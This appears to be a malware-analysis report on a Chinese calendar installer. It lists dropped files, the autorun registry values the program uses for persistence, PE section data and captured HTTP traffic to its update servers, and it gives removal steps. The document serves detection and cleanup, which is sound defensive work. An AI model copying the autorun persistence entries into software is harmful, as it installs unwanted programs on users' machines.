%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6BKNI.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-B6BC5.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J7PLB.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TKKFL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P73ID.tmp (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V911M.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K3A0H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFOCI.tmp (891 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S329D.tmp (943 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-ACG6D.tmp (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IDDQ0.tmp (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-TBR47.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\info.iam (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DC97P.tmp (857 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RELD2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TLJE9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-99O8Q.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VP4MN.tmp (437 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IGNP2.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NM9J5.tmp (949 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6H2UT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0L13V.tmp (871 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N5L7C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A4S61.tmp (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2K1SC.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DAG71.tmp (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FPQV4.tmp (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\ItDownload_wex.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BM7CV.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-URB1U.tmp (820 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QDAFG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DO1SP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U18FV.tmp (896 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-U189L.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FMB0Q.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DRCF3.tmp (643 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\16246473[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4J0MN.tmp (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PCUV5.tmp (523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\core[1].php (750 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-QJ7LF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4P8GP.tmp (986 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6856F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIMV2.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SUTI1.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9IE2G.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2AFEU.tmp (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OUGF5.tmp (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AIDQ3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCB5A.tmp (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OR4OD.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHIVK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IMBOL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S9S0K.tmp (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0FVRG.tmp (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GJFDH.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-71SNV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SJIC0.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6DTUJ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QAKU2.tmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9TLEA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2LCQJ.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-05TI6.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FU923.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-R66KJ.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3H86F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GLIR6.tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-46B8N.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-6G59B.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5FR8P.tmp (913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TK5N6.tmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0VFG1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BKGKG.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SEBU8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GPUG4.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2CI1C.tmp (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[1].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-L41F1.tmp (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ESTCQ.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2GDDK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9M85H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-F8PVH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-TFPS7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-KJA02.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MTLQ9.tmp (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\a1[1].htm (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P6CRT.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2J6MD.tmp (317 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5I6TG.tmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J8GQQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3DN0I.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-316BT.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BH7KA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G8JJ3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A9JQ8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S7KL5.tmp (555 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FGDDO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UMDHA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3C4AS.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LFB1B.tmp (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-J82M1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2NU3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OSOGC.tmp (399 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IUPL8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SAHIH.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-IE9GS.tmp (7 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\å°Â新日历\å°Â新日历.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SBNVG.tmp (13 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\å°Â新日历\访问 å°Â新日历官网.url (59 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-QT79M.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CC08P.tmp (523 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NV4JR.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3SAPP.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-V00NQ.tmp (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-G5L56.tmp (578 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-11QQC.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-97IOG.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-I0SJ8.tmp (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1PRVS.tmp (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJG3S.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RHLM.tmp (545 bytes)
%Documents and Settings%\All Users\Desktop\ÎäÒ×´«Ææ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8K221.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NMQV.tmp (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-76EL3.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-77Q9F.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-THFVL.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-QI037.tmp (32054 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-453FH.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-RSEVU.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.msg (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-GDLU4.tmp (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BUO0T.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-4U9TL.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T8AV0.tmp (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HIP4A.tmp (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MPKRV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NB26.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-HAV0P.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8NFLP.tmp (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-S4UJK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ECGSQ.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BA97O.tmp (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-CR36B.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UJ2MO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GGFP6.tmp (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-9B6IC.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7SN9K.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-H81BC.tmp (871 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S0HP8.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-UOMB9.tmp (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliquicken" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe apprun"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: ????
Product Name: ????
Product Version: 4.0
Legal Copyright: Copyright (c) 2012-2014 ????, Inc.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2014.1231.1429.17
File Description: ?????????????
Comments: This installation was built with Inno Setup.
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 61740 | 61952 | 4.43024 | 3a126e478661f20816f9d9285615f98e |
.itext | 69632 | 2884 | 3072 | 3.97317 | ba48b9b17b3dd8b92da3bd93f20ddb34 |
.data | 73728 | 3208 | 3584 | 1.55702 | d7fd5f4b562d7961758f3d6a8c834fd0 |
.bss | 77824 | 22196 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 102400 | 3536 | 3584 | 3.44625 | 93d91a2b90e60bd758fc0c4908856ae1 |
.tls | 106496 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 110592 | 24 | 512 | 0.14174 | 3dffc444ccc131c9dcee18db49ee6403 |
.rsrc | 114688 | 45568 | 45568 | 2.86895 | 3795fb89fbfecd85594d38cfa6b28bf5 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Version.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 09 Aug 2014 08:02:10 GMT
Accept-Ranges: bytes
ETag: "2ec9bb38a8b3cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:30 GMT
Content-Length: 1
0
GET /htmlinset1.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 09 Dec 2014 01:47:57 GMT
Accept-Ranges: bytes
ETag: "79ff2c285213d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 4
1,30
GET /md5.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 07 Aug 2014 07:53:04 GMT
Accept-Ranges: bytes
ETag: "c1e7b39e14b2cf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:31 GMT
Content-Length: 32
7CD80588C0C5215F6D688092950FE3E2
GET /uCalhtml.txt HTTP/1.1
User-Agent: HOST
Host: update.xiaoxinrili.com
Cache-Control: no-cache
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 17 Apr 2014 09:26:29 GMT
Accept-Ranges: bytes
ETag: "a3115a1d1f5acf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:32 GMT
Content-Length: 34
1|1F5083874528F2BF4E8B1F075214C827
GET /qian.html?%original file name%.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896
HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Wed, 26 Dec 2012 10:36:08 GMT
Accept-Ranges: bytes
ETag: "d828ad154e3cd1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:34 GMT
Content-Length: 204
GET /weather.txt HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 13 Nov 2014 06:14:04 GMT
Accept-Ranges: bytes
ETag: "8ee53b69ffcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:39 GMT
Content-Length: 38
12154|1b5d950e15ba193e96405dd75be5ab1f
GET /daohang/jsq/tj.html?%original file name%.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896; CNZZDATA4881483=cnzz_eid=1393858484-1421236290-&ntime=1421236290; CNZZDATA4878044=cnzz_eid=1356438655-1421233298-&ntime=1421233298
HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Tue, 26 Aug 2014 06:43:54 GMT
Accept-Ranges: bytes
ETag: "b6fbf11af9c0cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:59 GMT
Content-Length: 427
GET / HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: VVV.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=CE0FAF561B18F23CB0B3E0DC6F1BF515:FG=1; BAIDUPSID=CE0FAF561B18F23CB0B3E0DC6F1BF515; H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; BDSVRTM=0; BD_HOME=0
HTTP/1.1 200 OK
Date: Wed, 14 Jan 2015 11:51:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu e60e7b6c35705ff816372734f70b6014
Expires: Wed, 14 Jan 2015 11:50:51 GMT
X-Powered-By: HPHP
Server: BWS/1.1
BDPAGETYPE: 1
BDQID: 0xa7cae7870000b576
BDUSERID: 0
Set-Cookie: BDSVRTM=0; path=/
Set-Cookie: BD_HOME=0; path=/
Set-Cookie: H_PS_PSSID=10381_1459_10901_10488_10874_11110_11058_11067_10923_10700_10617_10702_10632; path=/; domain=.baidu.com
15092..<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta content="always" name="referrer"><link rel="dns-prefetch" href="//s1.bdstatic.com"/><link rel="dns-prefetch" href="//t1.baidu.com"/><link rel="dns-prefetch" href="//t2.baidu.com"/><link rel="dns-prefetch" href="//t3.baidu.com"/><link rel="dns-prefetch" href="//t10.baidu.com"/><link rel="dns-prefetch" href="//t11.baidu.com"/><link rel="dns-prefetch" href="//t12.baidu.com"/><link rel="dns-prefetch" href="//b1.bdstatic.com"/><title>...........................</title>.<style index="index" id="css_index">html,body{height:100%}html{overflow-y:auto}#wrapper{position:relative;_position:;min-height:100%}#head{padding-bottom:100px;text-align:center;*z-index:1}#ftCon{height:100px;position:absolute;bottom:44px;text-align:center;width:100%;margin:0 auto;z-index:0;overflow:hidden}#ftConw{width:720px;margin:0 auto}body{font:12px arial;text-align:;background:#fff}body,p,form,ul,li{margin:0;padding:0;list-style:none}body,form,#fm{position:relative}td{text-align:left}img{border:0}a{color:#00c}a:active{color:#f60}.bg{background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_3bfb8e45.png);background-repeat:no-repeat;_background-image:url(hXXp://s1.bdstatic.com/r/www/cache/static/global/img/icons_f72fb1cc.gif)}.bg_tuiguang_browser{
<<< skipped >>>
GET /city HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:44 GMT; path=/; HttpOnly
Set-Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5; expires=Wed, 14-Jan-2015 13:49:44 GMT; path=/; httponly
Cache-Control: no-cache
Date: Wed, 14 Jan 2015 11:49:44 GMT
1..1..0......
GET /city HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: 7day.xiaoxinrili.com
Connection: Keep-Alive
Cookie: laravel_session=2du4a4mvl5rvm8m4aufe91u2b5
HTTP/1.1 200 OK
Server: nginx/1.4.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.17
